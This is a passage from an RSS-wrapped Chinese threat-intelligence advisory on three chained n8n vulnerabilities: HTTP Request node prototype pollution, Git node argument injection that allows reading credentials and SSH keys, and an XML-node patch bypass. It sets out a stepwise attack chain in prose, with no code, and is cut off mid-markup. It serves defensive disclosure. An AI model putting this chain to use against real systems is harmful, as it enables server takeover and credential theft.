<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>奇安信威胁情报中心</title>
    <link>https://wechat2rss.xlab.app/feed/b93962f981247c0091dad08df5b7a6864ab888e9.xml</link>
    <description>威胁情报信息共享，事件预警通报，攻击事件分析报告，恶意软件分析报告&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (奇安信威胁情报中心)</managingEditor>
    <pubDate>Tue, 19 May 2026 10:50:48 +0800</pubDate>
    <lastBuildDate>Tue, 19 May 2026 10:50:48 +0800</lastBuildDate>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7I8QeMG3CujdN79zxbczFS3XAMP0KcY9YcqkRIHEy7CQ/0</url>
      <title>奇安信威胁情报中心</title>
      <link>https://wechat2rss.xlab.app/feed/b93962f981247c0091dad08df5b7a6864ab888e9.xml</link>
    </image>
    <item>
      <title>n8n 自动化平台惊现三重漏洞链：低权限即可引爆完整 RCE，攻击面已蔓延至供应链核心节点</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518838&amp;idx=1&amp;sn=a33e7f05cd5a946c51b0ff0fe8caa3eb</link>
      <description>安全研究人员 Jubke 披露了 n8n 平台中一组可串联利用的高危漏洞。三个漏洞（CVE-2026-44789、CVE-2026-44790、CVE-2026-44791）分布在 HTTP Request 节点、Git 节点和 XML 节点中，组合后可实现完整的远程代码执行（RCE）。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-05-19 10:50</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=5d2acb6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8Epu0VBVz9jxmz9Ye3efD4C3FOdOKCMF2QHSG4ecvVyzibq0vTmTxcXqh0lopzic4z9xhrTVW6CIMwhI98kN03S7TOJbJIekicKU%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>安全研究人员 Jubke 披露了 n8n 平台中一组可串联利用的高危漏洞。三个漏洞（CVE-2026-44789、CVE-2026-44790、CVE-2026-44791）分布在 HTTP Request 节点、Git 节点和 XML 节点中，组合后可实现完整的远程代码执行（RCE）。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">n8n 作为一款开源工作流程自动化平台，近年来在 DevOps 团队、SaaS 集成商以及中大型企业中迅速普及。其架构设计允许用户通过可视化方式串联 API、数据库、云服务和内部工具，构建高度自动化的业务流程。这种&#34;核心枢纽&#34;定位使其成为攻击者梦寐以求的目标——一旦攻陷平台本身，攻击者即可横向染指整个数据处理链。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测发现，安全研究人员 Jubke 披露了 n8n 平台中一组可串联利用的高危漏洞。三个漏洞（</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">CVE-2026-44789</span></code><span leaf="">、</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">CVE-2026-44790</span></code><span leaf="">、</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">CVE-2026-44791</span></code><span leaf="">）分布在 HTTP Request 节点、Git 节点和 XML 节点中，组合后可实现完整的远程代码执行（RCE）。更值得警惕的是，利用门槛极低——攻击者仅需拥有创建或编辑工作流程的基本权限，即可触发整条攻击链，完成从权限提升到服务器接管的全流程。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">受影响版本如下：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">n8n </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">&lt; 1.123.43</span></strong></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">n8n </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">&lt; 2.20.7</span></strong></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">n8n </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">&lt; 2.22.1</span></strong></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">官方已在修复版本中完成补丁推送，建议所有使用 n8n 的企业立即核查部署版本，并优先完成升级。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞技术分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-44789：HTTP Request 节点原型污染</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">严重等级</span></strong><span leaf="">：Critical | </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CWE</span></strong><span leaf="">：CWE-1321（原型污染）| </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">MITRE ATT&amp;CK</span></strong><span leaf="">：T1203</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该漏洞是三个漏洞中危害最为严重的一个，位于 n8n 的 HTTP Request 节点。问题根源在于分页参数校验存在缺陷，攻击者可以利用 JavaScript 原型污染（Prototype Pollution）技术向全局对象注入恶意属性。当受害实例上的其他工作流程被执行时，这些被污染的属性会触发意外行为，最终导致任意代码在服务器端执行。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">原型污染在 JavaScript 应用安全领域并非新鲜事物，但在自动化平台场景下危害被显著放大。n8n 的工作流程通常处理来自多个外部源的动态数据，一旦攻击者通过原型污染篡改了核心对象的运行时行为，破坏效应会沿着工作流程的执行链路级联传播，影响范围远超单一工作流程本身。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从攻击向量来看，这是一个纯网络侧攻击（AV:N），无需任何用户交互，CVSS 评分达到高危区间。攻击者可以在不触发任何告警的情况下完成 exploit。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-44790：Git 节点命令行注入</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">严重等级</span></strong><span leaf="">：High | </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CWE</span></strong><span leaf="">：CWE-88（命令参数注入）| </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">关联 MITRE ATT&amp;CK</span></strong><span leaf="">：T1059（命令与脚本解释器）</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第二个漏洞影响 Git 节点。当 n8n 执行 Git push 操作时，用户输入的某些参数被直接拼接到命令行参数中，未经过充分的边界校验。攻击者利用这一缺陷，可以在 Git push 过程中注入恶意 CLI 参数，进而读取服务器上的任意文件。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这一漏洞的破坏力不容低估。通过文件读取，攻击者可获取敏感信息，包括但不限于：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">配置文件中的数据库连接字符串</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">API 密钥和认证凭据</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">环境变量文件（</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.env</span></code><span leaf="">）</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">SSH 私钥及其他密钥材料</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">一旦攻击者获取了这些凭据，后续行动空间将大幅扩展——从横向移动到持久化控制，威胁等级迅速攀升。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-44791：XML 节点补丁绕过</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">严重等级</span></strong><span leaf="">：High | </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CWE</span></strong><span leaf="">：CWE-1321（原型污染）</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第三个漏洞是 XML 节点中早期安全修复的绕过。n8n 团队此前曾针对该节点的原型污染问题发布过补丁，但研究人员发现，通过替代数据路径仍可成功触发相同的污染行为。这意味着即便企业环境中已部署了之前的补丁，攻击者仍可利用这一绕过路径配合 CVE-2026-44789 实现完整的 RCE。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该漏洞的存在说明：在 JavaScript 运行时环境中，单一路径的修复不等于全局安全。&#34;头痛医头&#34;的修补策略在面对原型污染这类语言特性级别的漏洞时，往往难以根除问题。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击链解析：低权限如何撬开服务器大门</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">三个漏洞并非孤立存在，而是形成了一条完整的攻击链。以下是奇安信威胁情报团队还原的攻击路径：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第一步：立足</span></strong><span leaf="">。攻击者获取一个拥有工作流程创建/编辑权限的低权限账户。在多数企业环境中，DevOps 工程师、自动化管理员甚至部分业务人员都可能拥有这类权限。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第二步：污染</span></strong><span leaf="">。攻击者利用 CVE-2026-44789 在 HTTP Request 节点中构造恶意分页参数，通过原型污染向 JavaScript 全局对象注入恶意属性。这一步不需要任何管理员权限，仅利用节点本身的功能逻辑即可实现。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三步：横向扩大</span></strong><span leaf="">。通过 CVE-2026-44791 绕过此前针对 XML 节点的安全修复，确保原型污染路径在多种数据处理场景下均可持续生效。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, 